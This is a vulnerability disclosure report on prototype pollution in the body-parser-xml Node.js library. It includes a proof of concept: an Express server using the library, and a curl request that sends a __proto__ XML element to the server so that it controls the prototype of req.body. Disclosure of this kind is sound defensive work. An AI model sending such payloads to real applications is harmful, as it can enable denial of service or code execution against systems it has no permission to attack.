Prototype Pollution in fiznool/body-parser-xml

Valid
Reported on May 18th 2021

✍️ Description

This library delegates parsing to an XML parsing library whose output allows prototype pollution: an element named __proto__ in the request body ends up controlling the prototype of the parsed req.body object. The issue can be fixed on this library's side, independently of the underlying parser.

🕵️‍♂️ Proof of Concept

const express = require('express');
const bodyParser = require('body-parser');

require('body-parser-xml')(bodyParser);

const app = express();
const port = 3001;

app.use(bodyParser.xml({
  xmlParseOptions: {
    normalize: true,      // Trim whitespace inside text nodes
    normalizeTags: true,  // Transform tags to lowercase
    explicitArray: false, // Only put nodes in array if >1
  }
}));

app.post("/", (req, res) => {
  console.log(req.body);
  console.log(req.body.__proto__);
  return res.end("OK");
});

app.listen(port, () => {
  console.log(`Server at http://localhost:${port}`);
});

Then make a POST request:

curl -X POST http://localhost:3001/ -d "<__proto__><test>ok</test></__proto__>" -H "Content-Type: application/xml"

💥 Impact

Depending on how the parsed request body is used by the application, this vulnerability can lead to remote code execution or denial of service.